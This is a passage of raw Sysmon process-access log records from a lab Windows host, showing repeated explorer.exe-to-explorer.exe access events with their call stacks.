16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244710Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244709Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244708Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244707Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244706Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244705Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244704Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244703Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244702Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244701Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244700Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244699Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244698Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244697Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244696Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244695Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244694Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244693Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244692Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244691Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244690Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244689Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.670{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244688Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 